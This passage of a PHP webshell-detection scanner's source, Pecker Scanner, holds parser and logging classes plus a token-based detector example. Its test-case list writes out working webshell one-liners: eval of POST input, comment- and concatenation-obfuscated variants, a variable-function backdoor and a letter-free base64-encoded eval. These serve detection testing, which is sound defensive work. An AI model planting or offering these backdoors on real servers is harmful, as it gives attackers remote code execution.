231, 252, 253, 254, 426, 427, 428, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 146, 147, 148, 162, 149, 164, 150, 182, 151, 152, 153, 183, 154, 132, 443, 443, 443, 443, 443, 443, 443, 443, 443, 443, 443, 311, 485, 421, 421, 449, 417, 419, 419, 391, 393, 410, 424, 450, 453, 464, 470, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 335, 646, 646, 906, 906, 813, 813, 654, 
);
// generated LALR parser tables ($yygcheck, $yygbase, $yygdefault, $yylhs, $yylen) omitted here

protected $yyval;
protected $yyastk;
protected $stackPos;
protected $lexer;
protected $errMsg;
private $tokens;
private $tokensSkip = array(T_WHITESPACE, T_COMMENT, T_DOC_COMMENT, T_ENCAPSED_AND_WHITESPACE);
private $tokensVariable = array('{', '}');

/**
 * Creates a parser instance.
 *
 * @param PHPParser_Lexer $lexer A lexer
 */
public function __construct(Pecker_Lexer $lexer) {
    $this->lexer = $lexer;
    $this->tokens = array();
}

/**
 * Parses PHP code into a node tree.
 *
 * @param string $code The source code to parse
 *
 * @return PHPParser_Node[] Array of statements
 */
public function parse($code) {
    $bLexed = $this->lexer->startLexing($code);
    // We start off with no lookahead-token
    $tokenId = self::TOKEN_NONE;
    if (!$bLexed) {
        $this->errMsg = $this->lexer->getError();
        return false;
    }
    // The attributes for a node are taken from the first and last token of the node.
    // From the first token only the startAttributes are taken and from the last only
    // the endAttributes. Both are merged using the array union operator (+).
    $startAttributes = array('startLine' => 1);
    $endAttributes = array();
    // In order to figure out the attributes for the starting token, we have to keep
    // them in a stack
    $attributeStack = array($startAttributes);
    // Start off in the initial state and keep a stack of previous states
    $state = 0;
    $stateStack = array($state);
    // AST stack (?)
    $this->yyastk = array();
    // Current position in the stack(s)
    $this->stackPos = 0;
    $this->tokens = $this->lexer->getTokens();
    for (;;) {
        if (self::$yybase[$state] == 0) {
            $yyn = self::$yydefault[$state];
        } else {
            if ($tokenId === self::TOKEN_NONE) {
                // Fetch the next token id from the lexer and fetch additional info by-ref.
                // The end attributes are fetched into a temporary variable and only set once the token is really
                // shifted (not during read). Otherwise you would sometimes get off-by-one errors, when a rule is
                // reduced after a token was read but not yet shifted.
                $origTokenId = $this->lexer->getNextToken($tokenValue, $startAttributes, $nextEndAttributes);
                // map the lexer token id to the internally used token id's
                $tokenId = $origTokenId >= 0 && $origTokenId < self::TOKEN_MAP_SIZE
                    ? self::$translate[$origTokenId] : self::TOKEN_INVALID;
                if ($tokenId === self::TOKEN_INVALID) {
                    $this->errMsg = sprintf('The lexer returned an invalid token (id=%d, value=%s)', $origTokenId, $tokenValue);
                    return false;
                }
                $attributeStack[$this->stackPos] = $startAttributes;
            }
            if ((($yyn = self::$yybase[$state] + $tokenId) >= 0
                    && $yyn < self::YYLAST && self::$yycheck[$yyn] == $tokenId
                 || ($state < self::YY2TBLSTATE
                    && ($yyn = self::$yybase[$state + self::YYNLSTATES] + $tokenId) >= 0
                    && $yyn < self::YYLAST && self::$yycheck[$yyn] == $tokenId))
                && ($yyn = self::$yyaction[$yyn]) != self::YYDEFAULT) {
                /*
                 * >= YYNLSTATE: shift and reduce
                 * > 0: shift
                 * = 0: accept
                 * < 0: reduce
                 * = -YYUNEXPECTED: error
                 */
                if ($yyn > 0) {
                    /* shift */
                    ++$this->stackPos;
                    $stateStack[$this->stackPos] = $state = $yyn;
                    $this->yyastk[$this->stackPos] = $tokenValue;
                    $attributeStack[$this->stackPos] = $startAttributes;
                    $endAttributes = $nextEndAttributes;
                    $tokenId = self::TOKEN_NONE;
                    if ($yyn < self::YYNLSTATES) continue;
                    /* $yyn >= YYNLSTATES means shift-and-reduce */
                    $yyn -= self::YYNLSTATES;
                } else {
                    $yyn = -$yyn;
                }
            } else {
                $yyn = self::$yydefault[$state];
            }
        }
        for (;;) {
            /* reduce/error */
            if ($yyn == 0) {
                /* accept */
                return true;
            } elseif ($yyn != self::YYUNEXPECTED) {
                /* reduce
                try {
                    $this->{'yyn' . $yyn}(
                        $attributeStack[$this->stackPos - self::$yylen[$yyn]] + $endAttributes
                    );
                } catch (PHPParser_Error $e) {
                    if (-1 === $e->getRawLine()) {
                        $e->setRawLine($startAttributes['startLine']);
                    }
                    throw $e;
                }
                */
                /* Goto - shift nonterminal */
                $this->stackPos -= self::$yylen[$yyn];
                $yyn = self::$yylhs[$yyn];
                if (($yyp = self::$yygbase[$yyn] + $stateStack[$this->stackPos]) >= 0
                    && $yyp < self::YYGLAST && self::$yygcheck[$yyp] == $yyn) {
                    $state = self::$yygoto[$yyp];
                } else {
                    $state = self::$yygdefault[$yyn];
                }
                ++$this->stackPos;
                $stateStack[$this->stackPos] = $state;
                $this->yyastk[$this->stackPos] = $this->yyval;
                $attributeStack[$this->stackPos] = $startAttributes;
            } else {
                /* error */
                $expected = array();
                $base = self::$yybase[$state];
                for ($i = 0; $i < self::TOKEN_MAP_SIZE; ++$i) {
                    $n = $base + $i;
                    if ($n >= 0 && $n < self::YYLAST && self::$yycheck[$n] == $i
                        || $state < self::YY2TBLSTATE
                        && ($n = self::$yybase[$state + self::YYNLSTATES] + $i) >= 0
                        && $n < self::YYLAST && self::$yycheck[$n] == $i
                    ) {
                        if (self::$yyaction[$n] != self::YYUNEXPECTED) {
                            if (count($expected) == 4) {
                                /* Too many expected tokens */
                                $expected = array();
                                break;
                            }
                            $expected[] = self::$terminals[$i];
                        }
                    }
                }
                $expectedString = '';
                if ($expected) {
                    $expectedString = ', expecting ' . implode(' or ', $expected);
                }
                $this->errMsg = 'Syntax error, unexpected ' . self::$terminals[$tokenId] . $expectedString
                    . ' at line ' . $startAttributes['startLine'];
                return false;
            }
            if ($state < self::YYNLSTATES) break;
            /* >= YYNLSTATES means shift-and-reduce */
            $yyn = $state - self::YYNLSTATES;
        }
    }
    return true;
}

/**
 * get next tokens after a variable, like curly syntax
 * @param int $k
 * @return array
 */
public function getVariableToken($k) {
    $result = array();
    $res = '';
    $fun = '';
    for ($i = 1;; $i++) {
        if (isset($this->tokens[$k + $i])) {
            if (is_array($this->tokens[$k + $i])) {
                $fun .= $this->tokens[$k + $i][1];
                continue;
            } else {
                if (in_array($this->tokens[$k + $i], $this->tokensVariable)) {
                    $res = $this->tokens[$k + $i];
                    break;
                }
                $fun .= $this->tokens[$k + $i];
            }
        } else {
            break;
        }
    }
    $result['token'] = $res;
    $result['func'] = $fun;
    $result['key'] = $i - 1;
    return $result;
}

/**
 * get next token of $k without WHITESPACE
 * @param int $k
 * @return string
 */
public function getNextToken($k) {
    $res = '';
    for ($i = 1;; $i++) {
        if (isset($this->tokens[$k + $i])) {
            if (is_array($this->tokens[$k + $i])) {
                if (in_array($this->tokens[$k + $i][0], $this->tokensSkip)) {
                    continue;
                } else {
                    $res = $this->tokens[$k + $i][1];
                    break;
                }
            } else {
                $res = $this->tokens[$k + $i];
                break;
            }
        } else {
            break;
        }
    }
    return $res;
}

/**
 * get previous token of $k without WHITESPACE
 * @param int $k
 * @return string
 */
public function getPreToken($k) {
    $res = '';
    for ($i = 1; $k - $i >= 0; $i++) {
        if (isset($this->tokens[$k - $i])) {
            if (is_array($this->tokens[$k - $i])) {
                if (in_array($this->tokens[$k - $i][0], $this->tokensSkip)) {
                    continue;
                } else {
                    $res = $this->tokens[$k - $i][1];
                    break;
                }
            } else {
                $res = $this->tokens[$k - $i];
                break;
            }
        } else {
            break;
        }
    }
    return $res;
}

/**
 * get a piece of tokens after $k, ending with ; OR T_CLOSE_TAG
 * @param int $k
 * @return string
 */
public function getFilepathToken($k) {
    $str = '';
    for ($i = 1;; $i++) {
        if (isset($this->tokens[$k + $i])) {
            if (is_array($this->tokens[$k + $i])) {
                if ($this->tokens[$k + $i][0] == T_WHITESPACE) {
                    continue;
                } elseif ($this->tokens[$k + $i][0] == T_CLOSE_TAG) {
                    break;
                } else {
                    $str .= trim(trim($this->tokens[$k + $i][1], '"'), '\'');
                }
            } else {
                if ($this->tokens[$k + $i] == ';'
                    || ($this->tokens[$k + $i] == ')' && $this->getNextToken($k + $i) == ';')
                    || ($this->tokens[$k + $i] == ')' && $this->getNextToken($k + $i) == '.')) {
                    break;
                } elseif ($this->tokens[$k + $i] == '.') {
                    $str = '';
                    continue;
                }
                $str .= $this->tokens[$k + $i];
            }
        } else {
            break;
        }
    }
    return $str;
}

/**
 * get all tokens from $k to END TOKEN (T_CLOSE_TAG or ;)
 * @param int $k
 * @return array
 */
public function getPieceTokenAll($k) {
    $str = $str1 = '';
    $l = $r = 0;
    for ($i = 1;; $i++) {
        if (isset($this->tokens[$k + $i])) {
            if (is_array($this->tokens[$k + $i])) {
                if (in_array($this->tokens[$k + $i][0], array(T_CLOSE_TAG)) || ($l != 0 && $l == $r)) {
                    break;
                }
                if (!in_array($this->tokens[$k + $i][0], array(T_WHITESPACE, T_COMMENT, T_DOC_COMMENT, T_INLINE_HTML, T_ECHO, T_ENCAPSED_AND_WHITESPACE))) {
                    $str1 .= $this->tokens[$k + $i][1];
                }
                $str .= $this->tokens[$k + $i][1];
            } else {
                if ($this->tokens[$k + $i] == ';' || ($l != 0 && $l == $r)) {
                    break;
                }
                if ($this->tokens[$k + $i] == '(') {
                    $l++;
                }
                if ($this->tokens[$k + $i] == ')') {
                    $r++;
                }
                $str .= $this->tokens[$k + $i];
                $str1 .= $this->tokens[$k + $i];
            }
        } else {
            break;
        }
    }
    return array('more' => $str, 'less' => $str1);
}

/**
 * get all tokens
 * @return array
 */
public function getTokens() {
    return $this->tokens;
}

/**
 * get error messages
 * @return string
 */
public function getErrmsg() {
    return $this->errMsg;
}
}

class Pecker_Loger {
    protected $result;
    private $file;

    function __construct() {
        $this->result = array();
    }

    public function setFile($file) {
        $this->file = $file;
        $this->result[$this->file] = array('parser' => true, 'message' => '', 'function' => array());
    }

    public function errorLog($msg) {
        $this->result[$this->file]['parser'] = false;
        $this->result[$this->file]['message'] = $msg;
    }

    public function catchLog($func, $line, array $code = array('more' => '', 'less' => '')) {
        $this->result[$this->file]['parser'] = true;
        $this->result[$this->file]['function'][$func] = isset($this->result[$this->file]['function'][$func])
            ? $this->result[$this->file]['function'][$func] : array();
        $this->result[$this->file]['function'][$func][] = array('line' => $line, 'codemore' => $code['more'], 'codeless' => $code['less']);
    }

    public function getReport() {
        return $this->result;
    }
}
?>
call
/* inject check */
require dirname(__FILE__) . '/PeckerScanner.lite.php';
$scaner = new Pecker_Scanner();
$scaner->scanFileContent($filename, $newvalue);
$result = $scaner->getReport();
if (!empty($result[$filename]['function'])) {
    die("Request Error!");
}
/**/
0x4: Test cases
1. @eval($_POST['op']): success
2. @eval(${"_P"."OST"}['op']): success
3. @eval($/*aaa*/{"_P"."OST"}['op']): success
4. ($_=@$_GET[2]).@$_($_GET[1]): success
5. Letter-free variant: success
/*
$_="";
$_[+$_]++;
$_=$_."";
$___=$_[+""]; // A
$____=$___; $____++; // B
$_____=$____; $_____++; // C
$______=$_____; $______++; // D
$_______=$______; $_______++; // E
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++; // O
$_________=$________;
$_________++;$_________++;$_________++;$_________++; // S
$_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++; // R
$_____=$_________; $_____++; // T
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbMV0p"));
*/
6. $k = "{${phpinfo()}}": success
7. $a=$_POST['a'];$b=$_POST['b'];$a($b): dynamic execution through variables
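The test cases above show why a token-level view beats regular expressions: comments and string concatenation break a pattern match but not the token stream. The following is an added example, not Pecker Scanner's own code, that applies the same skip-whitespace-and-comments idea as the helper methods above to flag eval() and variable function calls fed from a superglobal; it assumes PHP 7.1+ with token_get_all(), and its sample inputs are constructed to mirror test cases 1, 3 and 4.

```php
<?php
// Added example, not Pecker Scanner's own code: a minimal token-stream check that
// flags eval() and variable function calls ($f(...)) whose argument list touches a
// superglobal, even when the name hides behind comments or string concatenation.
const SKIP_TOKENS = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
const SUPERGLOBALS = ['_GET', '_POST', '_REQUEST', '_COOKIE'];

// Tokenize and drop whitespace/comments, so `$/*aaa*/{...}` reads as `${...}`.
function significantTokens(string $code): array {
    return array_values(array_filter(token_get_all($code), function ($t) {
        return !(is_array($t) && in_array($t[0], SKIP_TOKENS, true));
    }));
}

// Fold a run of string literals joined by '.' ("_P"."OST") into one value.
function foldStrings(array $toks, int $i): string {
    $s = '';
    while (is_array($toks[$i] ?? null) && $toks[$i][0] === T_CONSTANT_ENCAPSED_STRING) {
        $s .= trim($toks[$i++][1], '"\'');
        if (($toks[$i] ?? null) !== '.') break;
        $i++;
    }
    return $s;
}

// Does the argument list opened by the '(' at $open mention a superglobal, directly ($_POST) or via ${"_P"."OST"}?
function argsTouchSuperglobal(array $toks, int $open): bool {
    for ($i = $open, $depth = 0; isset($toks[$i]); $i++) {
        $t = $toks[$i];
        if ($t === '(') { $depth++; continue; }
        if ($t === ')' && --$depth === 0) break;
        if (is_array($t) && $t[0] === T_VARIABLE && in_array(ltrim($t[1], '$'), SUPERGLOBALS, true)) return true;
        if ($t === '$' && ($toks[$i + 1] ?? null) === '{'
            && in_array(foldStrings($toks, $i + 2), SUPERGLOBALS, true)) return true;
    }
    return false;
}

// Returns one human-readable finding per suspicious call site.
function scanForDynamicExec(string $code): array {
    $toks = significantTokens($code);
    $hits = [];
    foreach ($toks as $i => $t) {
        if (!is_array($t) || ($toks[$i + 1] ?? null) !== '(' || !in_array($t[0], [T_EVAL, T_VARIABLE], true)) continue;
        if (argsTouchSuperglobal($toks, $i + 1)) {
            $hits[] = sprintf('line %d: %s(...) fed from a superglobal', $t[2], $t[0] === T_EVAL ? 'eval' : $t[1]);
        }
    }
    return $hits;
}

// Constructed samples mirroring test cases 1, 3 and 4 above, plus a benign line (reports []).
foreach (['<?php @eval($_POST[\'op\']);', '<?php @eval($/*aaa*/{"_P"."OST"}[\'op\']);',
          '<?php ($_=@$_GET[2]).@$_($_GET[1]);', '<?php echo htmlspecialchars($_GET[\'q\']);'] as $code) {
    echo json_encode(scanForDynamicExec($code)), "\n";
}
```

The letter-free sample (case 5) is deliberately out of reach for this check: it never names a superglobal in the token stream, which is why Pecker Scanner also records variable-function call sites through getPieceTokenAll() for review rather than relying on names alone.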
Relevant Link:
http://www.cnxct.com/pecker-scanner-beta-release-support-cloud-confirmation/
Copyright (c) 2015 LittleHann All rights reserved